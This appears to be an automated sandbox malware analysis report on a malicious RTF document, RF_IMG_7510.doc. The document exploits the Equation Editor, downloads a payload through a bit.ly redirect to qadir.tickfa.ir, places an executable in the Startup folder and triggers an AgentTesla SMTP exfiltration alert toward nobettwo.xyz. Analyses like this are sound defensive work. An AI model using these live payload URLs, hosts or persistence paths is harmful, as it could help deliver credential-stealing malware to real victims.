                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Thu Feb 25 18:39:34 2021, length=934282, window=hide
                                                Category:dropped
                                                Size (bytes):2038
                                                Entropy (8bit):4.559110855713253
                                                Encrypted:false
                                                SSDEEP:48:8/k/XTFGqT3X8NjXNoQh2/k/XTFGqT3X8NjXNoQ/:8/k/XJGqDWNoQh2/k/XJGqDWNoQ/
                                                MD5:377DB5B6BC763EADE19B358135428530
                                                SHA1:8AB1BF6AC03BD05E357410BC59164883DFC10708
                                                SHA-256:FFB3A85657750E7053BF36E4AF479B13CED88D440749B2AA61E63CCDCC48F3EA
                                                SHA-512:CBA93534B604F27DCA829AA23CA99DF6569095980AA6A2F1F31BDF0B80FAF05A2AE79AB7C3848D5EDF6E77EF8F4BACE72D62709632F0A82C16E5A5231C0C8538
                                                Malicious:false
                                                Reputation:low
                                                Preview: L..................F.... ...s.G..{..s.G..{../t......A...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2..A..YR. .RF_IMG~1.DOC..L.......Q.y.Q.y*...8.....................R.F._.I.M.G._.7.5.1.0...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\134349\Users.user\Desktop\RF_IMG_7510.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.F._.I.M.G._.7.5.1.0...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......134349..........D_....3N...W...9F.C...........[D_....3N...W...9F
                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):71
                                                Entropy (8bit):4.374361647875774
                                                Encrypted:false
                                                SSDEEP:3:M1TOMAlvDOMAlmX1TOMAlv:MpR0DRrRC
                                                MD5:381D0A2BD29339675A9546AD64672997
                                                SHA1:239FF30A2C3576EAEC6E15293D135B685985FAAF
                                                SHA-256:311A4D3FF1F6BAF34650721D768AF36CF1383499E540C6DB8D39A5C81E12968F
                                                SHA-512:2CF8D7D44F709943BA5CB270540A4A548372C046E0595E92899FB1C2B96A474E28C9774E43D90258D5ADFD69B8761BAAD42E79985202E99AFA58BA8C2CA2B9AD
                                                Malicious:false
                                                Reputation:low
                                                Preview: [doc]..RF_IMG_7510.LNK=0..RF_IMG_7510.LNK=0..[doc]..RF_IMG_7510.LNK=0..
                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.431160061181642
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:Qn:Qn
                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                Malicious:false
                                                Preview: ..
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WYBYWM6N.txt
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:ASCII text
                                                Category:downloaded
                                                Size (bytes):89
                                                Entropy (8bit):4.404363038876712
                                                Encrypted:false
                                                SSDEEP:3:jvFMIGUH1l46yHbi2ORdvLXvqcnT/n:yL646yHbi2+dvLXvqcnD
                                                MD5:77AB605232195A2D5027D3BCA11F50CA
                                                SHA1:06444D48A1945B7DF354D2D0D126B7C1F71C9D52
                                                SHA-256:F678B107181946973BC4ABD5FA49E6C1C2758EB289B7EBF690A18329D1411C9E
                                                SHA-512:A3AE810816B6FC4C8D77AE71384FDC5AC2D28EA8410C3951905BB167F039AA47EFA11072C5FAFAB966A507F67D5F877F68E34A19EA86022705EB120AA4F401D3
                                                Malicious:false
                                                IE Cache URL:bit.ly/
                                                Preview: _bit.l1paDi-7751c57c0afe6a460a-00p.bit.ly/.1536.1248792320.30906580.988944257.30870446.*.
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T7PO5EQ31SVDWZPIQNM6.temp
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):8016
                                                Entropy (8bit):3.589223903384664
                                                Encrypted:false
                                                SSDEEP:96:chQCsMq+qvsqvJCwoaz8hQCsMq+qvsEHyqvJCworIz1YKrdHxZqHXlUVMIu:cyDoaz8yXHnorIz1h7ZqHnIu
                                                MD5:3F67EAD3EA220F87FA6D46A4C212D0AB
                                                SHA1:77E1DC1C308E53CB8EF7AF51A5FD98465D2FAE38
                                                SHA-256:8E6169A19F67197867EA4D3AE88D6DD60765BBB97BA7D2F461B6501769F7DD72
                                                SHA-512:CB87FAD4278865C95E242A86015AB4E2879F04AE9B9248E095618A2A23D664F41A6796457AE7BF0D31203B4FF4DB3417EFA9CCD0083C59263CE4A108F203087F
                                                Malicious:false
                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YYU32XDMX6X5FS37H4KQ.temp
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):8016
                                                Entropy (8bit):3.589223903384664
                                                Encrypted:false
                                                SSDEEP:96:chQCsMq+qvsqvJCwoaz8hQCsMq+qvsEHyqvJCworIz1YKrdHxZqHXlUVMIu:cyDoaz8yXHnorIz1h7ZqHnIu
                                                MD5:3F67EAD3EA220F87FA6D46A4C212D0AB
                                                SHA1:77E1DC1C308E53CB8EF7AF51A5FD98465D2FAE38
                                                SHA-256:8E6169A19F67197867EA4D3AE88D6DD60765BBB97BA7D2F461B6501769F7DD72
                                                SHA-512:CB87FAD4278865C95E242A86015AB4E2879F04AE9B9248E095618A2A23D664F41A6796457AE7BF0D31203B4FF4DB3417EFA9CCD0083C59263CE4A108F203087F
                                                Malicious:false
                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):620032
                                                Entropy (8bit):7.223416647299071
                                                Encrypted:false
                                                SSDEEP:12288:fFQMGhfwkDj84te4xzFZF49OR7tQt4mcl:fFpGhfwO84teOV49OR7tQte
                                                MD5:3A89CF2D6D2449EF1A9640AF29F3A782
                                                SHA1:220B9C5B4C7E9DE15753F629DA1AC3A075DC0800
                                                SHA-256:3D652EB897291F8EB2FE8F9374007388B0CD426A797DE77545B82A325DDE762A
                                                SHA-512:8B016C645C5CC5874F9FBD9539846CC74A07BA33DB75E11D0FD80EEEC8D0DCAE081B7B4A4090B5F806A2CE38BD8EACA859E15962441C691FD42995AE7FF9F974
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J7`..............0.................. ........@.. ....................................@.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc...............t..............@..B........................H.......t................-..Vf..........................................6.~....(#...&*6.r...p(?...&*..*....oe...}......of...}......}....*.(....r...p(.........~....~....op...oq..........*B.(r......(.....*.(}........*".(.....*&.(r.....*".......*".(.....*Vs....(....t..... ...*...0............}.....(.......(......{....r...po......{.....o.......}.....s....}......(....r...p(....}.....{....(....&..{....(.....i}.....(.....*..0..c.........{.........,f...s....}.....{.....o.......}.....
                                                C:\Users\user\Desktop\~$_IMG_7510.doc
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.431160061181642
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                Malicious:false
                                                Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                C:\Users\Public\69577.exe
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):620032
                                                Entropy (8bit):7.223416647299071
                                                Encrypted:false
                                                SSDEEP:12288:fFQMGhfwkDj84te4xzFZF49OR7tQt4mcl:fFpGhfwO84teOV49OR7tQte
                                                MD5:3A89CF2D6D2449EF1A9640AF29F3A782
                                                SHA1:220B9C5B4C7E9DE15753F629DA1AC3A075DC0800
                                                SHA-256:3D652EB897291F8EB2FE8F9374007388B0CD426A797DE77545B82A325DDE762A
                                                SHA-512:8B016C645C5CC5874F9FBD9539846CC74A07BA33DB75E11D0FD80EEEC8D0DCAE081B7B4A4090B5F806A2CE38BD8EACA859E15962441C691FD42995AE7FF9F974
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J7`..............0.................. ........@.. ....................................@.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc...............t..............@..B........................H.......t................-..Vf..........................................6.~....(#...&*6.r...p(?...&*..*....oe...}......of...}......}....*.(....r...p(.........~....~....op...oq..........*B.(r......(.....*.(}........*".(.....*&.(r.....*".......*".(.....*Vs....(....t..... ...*...0............}.....(.......(......{....r...po......{.....o.......}.....s....}......(....r...p(....}.....{....(....&..{....(.....i}.....(.....*..0..c.........{.........,f...s....}.....{.....o.......}.....

                                                Static File Info

                                                General

                                                File type:Rich Text Format data, unknown version
                                                Entropy (8bit):6.274798613053925
                                                TrID:
                                                • Rich Text Format (5005/1) 55.56%
                                                • Rich Text Format (4004/1) 44.44%
                                                File name:RF_IMG_7510.doc
                                                File size:934282
                                                MD5:0551c37e30c260db5280bf425158b5b9
                                                SHA1:840c2cabdf7c0c31695e2b8ff9c4742f21555f65
                                                SHA256:96703b50d7076b66dffce4f08ec5d1fca31f394b441bca2476eae3aaad6a6d50
                                                SHA512:1343b79cd3481956a62792df8b28dcc13754c463186294902906121e6134257c642497fa31f2467ebd570016b157225ddab60ed36d92a4ee292eed09b4095899
                                                SSDEEP:24576:xHcTHcTHcTHcTHcTHcTHcTHcTHcTHcTHcTHcTHcTHcTHcTHcTHcTHcTHcTHcTHc2:xHcTHcTHcTHcTHcTHcTHcTHcTHcTHcT7
                                                File Content Preview:{\rtf33843\page51787859448176035@m42JEUa4SrclZjjE@-KI2WTYrCCIYwauZ0C<eh&&7_M-C_D--_-V,64>88964$Cv>yt=n6|:%_>jn8%bm\mklP;=u\k6588.14.... .... ...... .... .... ....

                                                File Icon

                                                Icon Hash:e4eea2aaa4b4b4a4

                                                Static RTF Info

                                                Objects

                                                IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                0000DA29Bhno

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                02/25/21-11:41:12.202831TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49170587192.168.2.22198.54.126.101

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Feb 25, 2021 11:39:18.702184916 CET4916780192.168.2.2267.199.248.10
                                                Feb 25, 2021 11:39:18.753602982 CET804916767.199.248.10192.168.2.22
                                                Feb 25, 2021 11:39:18.753792048 CET4916780192.168.2.2267.199.248.10
                                                Feb 25, 2021 11:39:18.754411936 CET4916780192.168.2.2267.199.248.10
                                                Feb 25, 2021 11:39:18.805741072 CET804916767.199.248.10192.168.2.22
                                                Feb 25, 2021 11:39:18.895798922 CET804916767.199.248.10192.168.2.22
                                                Feb 25, 2021 11:39:18.895906925 CET4916780192.168.2.2267.199.248.10
                                                Feb 25, 2021 11:39:19.012645006 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.137965918 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.138154030 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.138669968 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.276586056 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.277499914 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.277523994 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.277543068 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.277564049 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.277585030 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.277606010 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.277642965 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.277652025 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.277664900 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.277667999 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.277668953 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.277674913 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.277677059 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.277697086 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.277726889 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.277735949 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.281305075 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.286509991 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.286643982 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.399622917 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.399662018 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.399677038 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.399703026 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.399722099 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.399744987 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.399763107 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.399852991 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.399883032 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.399885893 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.519587994 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.519649029 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.519687891 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.519743919 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.519850016 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.520564079 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.520607948 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.520647049 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.520729065 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.520807028 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.520847082 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.520885944 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.520922899 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.520961046 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.520998955 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.521047115 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.521092892 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.524549007 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.524576902 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.524579048 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.524581909 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.524584055 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.524585962 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.524588108 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.524589062 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.524590969 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.524591923 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.524594069 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.524595976 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.524596930 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.524599075 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.639516115 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.639548063 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.639561892 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.639575958 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.639590025 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.639602900 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.639620066 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.639734983 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.641488075 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.643623114 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.643656969 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.643672943 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.643687010 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.643702984 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.643723011 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.643735886 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.643765926 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.643779039 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.643788099 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.643795013 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.643805027 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.643812895 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.643821955 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.643831968 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.643838882 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.643850088 CET4916880192.168.2.22188.253.2.221
                                                Feb 25, 2021 11:39:19.643851995 CET8049168188.253.2.221192.168.2.22
                                                Feb 25, 2021 11:39:19.643866062 CET4916880192.168.2.22188.253.2.221

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Feb 25, 2021 11:39:18.633120060 CET5219753192.168.2.228.8.8.8
                                                Feb 25, 2021 11:39:18.681853056 CET53521978.8.8.8192.168.2.22
                                                Feb 25, 2021 11:39:18.921547890 CET5309953192.168.2.228.8.8.8
                                                Feb 25, 2021 11:39:19.010390043 CET53530998.8.8.8192.168.2.22
                                                Feb 25, 2021 11:40:57.058729887 CET5283853192.168.2.228.8.8.8
                                                Feb 25, 2021 11:40:57.128315926 CET53528388.8.8.8192.168.2.22
                                                Feb 25, 2021 11:40:57.128812075 CET5283853192.168.2.228.8.8.8
                                                Feb 25, 2021 11:40:57.190656900 CET53528388.8.8.8192.168.2.22
                                                Feb 25, 2021 11:41:10.377747059 CET6120053192.168.2.228.8.8.8
                                                Feb 25, 2021 11:41:10.444587946 CET53612008.8.8.8192.168.2.22
                                                Feb 25, 2021 11:41:10.445128918 CET6120053192.168.2.228.8.8.8
                                                Feb 25, 2021 11:41:10.502433062 CET53612008.8.8.8192.168.2.22

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Feb 25, 2021 11:39:18.633120060 CET192.168.2.228.8.8.80x82b3Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                Feb 25, 2021 11:39:18.921547890 CET192.168.2.228.8.8.80xe9daStandard query (0)qadir.tickfa.irA (IP address)IN (0x0001)
                                                Feb 25, 2021 11:40:57.058729887 CET192.168.2.228.8.8.80xd799Standard query (0)nobettwo.xyzA (IP address)IN (0x0001)
                                                Feb 25, 2021 11:40:57.128812075 CET192.168.2.228.8.8.80xd799Standard query (0)nobettwo.xyzA (IP address)IN (0x0001)
                                                Feb 25, 2021 11:41:10.377747059 CET192.168.2.228.8.8.80x638Standard query (0)nobettwo.xyzA (IP address)IN (0x0001)
                                                Feb 25, 2021 11:41:10.445128918 CET192.168.2.228.8.8.80x638Standard query (0)nobettwo.xyzA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Feb 25, 2021 11:39:18.681853056 CET8.8.8.8192.168.2.220x82b3No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                Feb 25, 2021 11:39:18.681853056 CET8.8.8.8192.168.2.220x82b3No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                Feb 25, 2021 11:39:19.010390043 CET8.8.8.8192.168.2.220xe9daNo error (0)qadir.tickfa.ir188.253.2.221A (IP address)IN (0x0001)
                                                Feb 25, 2021 11:40:57.128315926 CET8.8.8.8192.168.2.220xd799No error (0)nobettwo.xyz198.54.126.101A (IP address)IN (0x0001)
                                                Feb 25, 2021 11:40:57.190656900 CET8.8.8.8192.168.2.220xd799No error (0)nobettwo.xyz198.54.126.101A (IP address)IN (0x0001)
                                                Feb 25, 2021 11:41:10.444587946 CET8.8.8.8192.168.2.220x638No error (0)nobettwo.xyz198.54.126.101A (IP address)IN (0x0001)
                                                Feb 25, 2021 11:41:10.502433062 CET8.8.8.8192.168.2.220x638No error (0)nobettwo.xyz198.54.126.101A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • bit.ly
                                                • qadir.tickfa.ir

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.224916767.199.248.1080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 11:39:18.754411936 CET0OUTGET /2MrI2J8 HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: bit.ly
                                                Connection: Keep-Alive
                                                Feb 25, 2021 11:39:18.895798922 CET1INHTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Thu, 25 Feb 2021 10:39:18 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 128
                                                Cache-Control: private, max-age=90
                                                Location: http://qadir.tickfa.ir/I4/RF_IMG_7510.jpg
                                                Set-Cookie: _bit=l1paDi-7751c57c0afe6a460a-00p; Domain=bit.ly; Expires=Tue, 24 Aug 2021 10:39:18 GMT
                                                Via: 1.1 google
